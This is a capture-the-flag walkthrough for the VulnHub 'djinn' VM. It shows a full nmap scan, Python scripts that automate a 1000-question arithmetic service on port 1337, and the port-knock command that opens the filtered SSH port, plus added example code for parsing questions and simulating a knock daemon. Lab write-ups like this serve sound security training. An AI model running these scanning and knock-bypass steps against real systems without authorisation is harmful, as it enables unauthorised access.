- djinn.ova (Size: 1.9 GB)
- Download: https://drive.google.com/file/d/1LlT5JcdlyDUcvkn12t9oIIFo0X9Gt53B/view?usp=sharing
- Download (Mirror): https://download.vulnhub.com/djinn/djinn.ova
First, scan with nmap. Port 22 shows up as filtered:
└─# nmap -sV -p- -A -O 192.168.68.217
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-17 04:46 EST
Nmap scan report for djinn.lan (192.168.68.217)
Host is up (0.00030s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.68.104
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '/', 1)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '/', 7)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
Let's try port 1337.
As shown in the figure, this port wants us to answer 1000 arithmetic questions....
Let's automate it with a socket; exp v0.0.1:
import socket
import time

client = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
client.connect(('192.168.68.217', 1337))  # Here to change the ip and port
b = client.recv(4096)  # consume the banner

def result(a, b, c):
    if c == "+":
        return a + b
    elif c == "-":
        return a - b
    elif c == "*":
        return a * b
    elif c == "/":
        return a / b

i = 0
while True:
    byte = client.recv(4096)
    content = byte.decode(encoding="UTF-8")
    content = content.split("(")[1]   # keep the part after '(', e.g. "3, '+', 8)"
    a = int(content[0])               # first operand (single digit)
    operate = content[4]              # operator character
    b = int(content[8])               # second operand (single digit)
    # print(content)
    print(a, operate, b)
    rsl = (str(result(a, b, operate)) + "\n").encode(encoding="UTF-8")
    client.sendall(rsl)
    print(result(a, b, operate), " has sent,for ", i + 1, " in 1000\n")
    i += 1
    time.sleep(0.1)
    if (i == 1001):
        break
content = client.recv(2048)           # read whatever the service says after the last answer
print(content.decode(encoding="UTF-8"))
Of course, the code style of this version leaves something to be desired.
The next day I wrote another one with subprocess,
exp v0.1:
import subprocess
import time, sys

def result(a, b, operate):
    if operate == "+":
        return a + b
    elif operate == "-":
        return a - b
    elif operate == "*":
        return a * b
    elif operate == "/":
        return a / b

def feedback():
    # parse the question held in the global `content`, e.g. b"(3, '+', 8)"
    str1 = content.decode().strip().split("(")[1]
    a = int(str1[0])
    operate = str1[4]
    b = int(str1[8])
    # print(str1)
    print(a, operate, b)
    rsl = str(result(a, b, operate))
    print(rsl)
    proc.stdin.write((rsl + "\n").encode(encoding='UTF-8'))
    proc.stdin.flush()
    time.sleep(0.01)

print(r"__ ___ _ _ ",
      r"\ \ / (_) | _(_)_ __ __ _ ",
      r" \ \ / /| | |/ / | '__/ _` |",
      r" \ V / | | <| | | | (_| |",
      r" \_/ |_|_|\_\_|_| \__,_|",
      sep="\n"
      )
try:
    ip = str(sys.argv[1])
except IndexError:
    print("usage: python tel.py ip")
    exit(1)
# drive nc through pipes instead of opening the socket ourselves
proc = subprocess.Popen("nc " + ip + " 1337", shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdout=subprocess.PIPE)
time.sleep(0.01)
content = proc.stdout.readline()
# skip the banner until the first question line (it contains ", '")
while ", \'" not in content.decode("UTF-8"):
    content = proc.stdout.readline()
    print(content.decode().strip())
feedback()
for i in range(1000):
    content = proc.stdout.readline()
    feedback()
    print(i + 1, "in", 1000)
# the closing message spans a few lines
for i in range(3):
    content = proc.stdout.readline()
    print(content.decode().strip())
The run is shown in the figure:
It eventually finished and handed out three ports: 1356, 6784, 3409.
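Both scripts above read the operands by fixed character offset, which only works while the numbers are single digits. As an added example (my code, not the writeup's), here is a regex-based parser for the same "(a, 'op', b)" question format that also accepts wider integers and ignores the banner text that arrives in the same read; the sample chunk is constructed, and the arithmetic keeps the same semantics as the result() helper on the page.

```python
import re

# Matches one question such as "(3, '*', 8)"; the accepted operators are the
# four the page's result() helper handles. Multi-digit support is a
# generalisation beyond what the writeup shows.
QUESTION_RE = re.compile(r"\(\s*(-?\d+)\s*,\s*'([+\-*/])'\s*,\s*(-?\d+)\s*\)")


def parse_question(text):
    """Return (a, op, b) for the first question found in `text`, or None when
    the text carries no question (banner lines, closing message)."""
    m = QUESTION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), m.group(2), int(m.group(3))


def compute(a, op, b):
    """Same operator semantics as the page's result() helper."""
    if op == "+":
        return a + b
    if op == "-":
        return a - b
    if op == "*":
        return a * b
    if op == "/":
        return a / b
    raise ValueError("unsupported operator: %r" % op)


def answer_bytes(text):
    """Turn one received chunk into the reply line to send back, or None if
    the chunk holds no question."""
    parsed = parse_question(text)
    if parsed is None:
        return None
    return (str(compute(*parsed)) + "\n").encode("utf-8")


# Constructed sample: banner text followed by the first question in the same
# read, which is how the nmap fingerprint above shows the service behaving.
SAMPLE_CHUNK = ("Let's see how good you are with simple maths\n"
                "Answer my questions 1000 times and I'll give you your gift.\n"
                "(12, '*', 7)\n")

if __name__ == "__main__":
    print(parse_question(SAMPLE_CHUNK), answer_bytes(SAMPLE_CHUNK))
```

Dropping the parser into either script replaces the three `str1[...]` index reads with one `parse_question()` call, and a `None` result tells the loop it is still looking at the banner.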
My guess is port knocking; quoting the wiki:
What is Port Knocking?
Port knocking is a method of opening a port on a firewall from the outside by generating connection attempts on a set of prespecified closed ports. Once the correct sequence of connection attempts is received, the firewall rules are modified dynamically to allow the host that sent them to connect through a specific port.
The main purpose of port knocking is to stop an attacker from discovering potentially exploitable services with a port scan: unless the attacker sends the correct knock sequence, the protected port appears closed.
For example:
Say the server is configured so that once it receives, from the same user, a sequence of connection attempts to ports 2048, 2049, 2055 and 2058, it opens TCP port 28; that user can then work remotely through that port, and the port is closed again automatically when the connection ends.
So we run
knock 192.168.68.217 1356 6784 3409 -v
to knock the three ports in turn.
Port 22, which was filtered before, is now open.
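To make the wiki description concrete, here is an added example (my own code, not knockd's and not from the writeup) that models the per-source state a knock daemon keeps. The sequence is the one the 1337 service handed out above; the 5-second limit between knocks, the reset rule for an out-of-order port and the event format (timestamp, source address, destination port) are assumptions, and the traffic is constructed, not captured from the VM. The replay shows why a sequential port scan that happens to touch all three ports never opens port 22.

```python
from collections import namedtuple

KNOCK_SEQUENCE = (1356, 6784, 3409)   # the ports the 1337 service returned
KNOCK_TIMEOUT = 5.0                   # max seconds between consecutive knocks (assumed)
PROTECTED_PORT = 22                   # the port nmap reported as filtered

# One observed connection attempt on a closed port (assumed event format).
Knock = namedtuple("Knock", "ts src dport")


class KnockTracker:
    """Per-source progress through the knock sequence (hypothetical daemon model)."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.progress = {}    # src -> (index of next expected knock, ts of last knock)
        self.opened = set()   # sources for which PROTECTED_PORT was opened

    def observe(self, src, dport, ts):
        """Feed one connection attempt; return True when it completes the
        sequence for `src`, i.e. the firewall rule should be added now."""
        idx, last_ts = self.progress.get(src, (0, ts))
        if idx > 0 and ts - last_ts > self.timeout:
            idx = 0                   # too slow: start over
        if dport == self.sequence[idx]:
            idx += 1                  # the knock we were waiting for
        elif dport == self.sequence[0]:
            idx = 1                   # wrong knock, but a valid first one
        else:
            idx = 0                   # any other port resets the sequence
        if idx == len(self.sequence):
            self.progress.pop(src, None)
            self.opened.add(src)
            return True
        self.progress[src] = (idx, ts)
        return False

    def is_open_for(self, src):
        return src in self.opened


def replay(events, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
    """Run Knock events through a fresh tracker; return the sources that
    completed the sequence. Per-source state is independent, so interleaving
    across sources does not matter."""
    tracker = KnockTracker(sequence, timeout)
    for ev in events:
        tracker.observe(ev.src, ev.dport, ev.ts)
    return tracker.opened


# Constructed sample traffic:
#  - 10.0.0.5 knocks the three ports in order, one second apart
#  - 10.0.0.9 scans 1350..1360 sequentially, then also hits 6784 and 3409
#  - 10.0.0.7 knocks in order but waits 10 s between the first two knocks
SAMPLE_EVENTS = (
    [Knock(0.0, "10.0.0.5", 1356), Knock(1.0, "10.0.0.5", 6784), Knock(2.0, "10.0.0.5", 3409)]
    + [Knock(0.1 * i, "10.0.0.9", p) for i, p in enumerate(range(1350, 1361))]
    + [Knock(3.0, "10.0.0.9", 6784), Knock(3.1, "10.0.0.9", 3409)]
    + [Knock(0.0, "10.0.0.7", 1356), Knock(10.0, "10.0.0.7", 6784), Knock(11.0, "10.0.0.7", 3409)]
)

if __name__ == "__main__":
    opened = replay(SAMPLE_EVENTS)
    for src in sorted({ev.src for ev in SAMPLE_EVENTS}):
        print("%-10s port %d %s" % (src, PROTECTED_PORT, "OPEN" if src in opened else "closed"))
```

Only 10.0.0.5 ends up with port 22 open: the scanner's hit on 1357 right after 1356 resets its progress, and the slow knocker trips the timeout. A real daemon would additionally remove the rule again once the session ends, as the wiki excerpt describes.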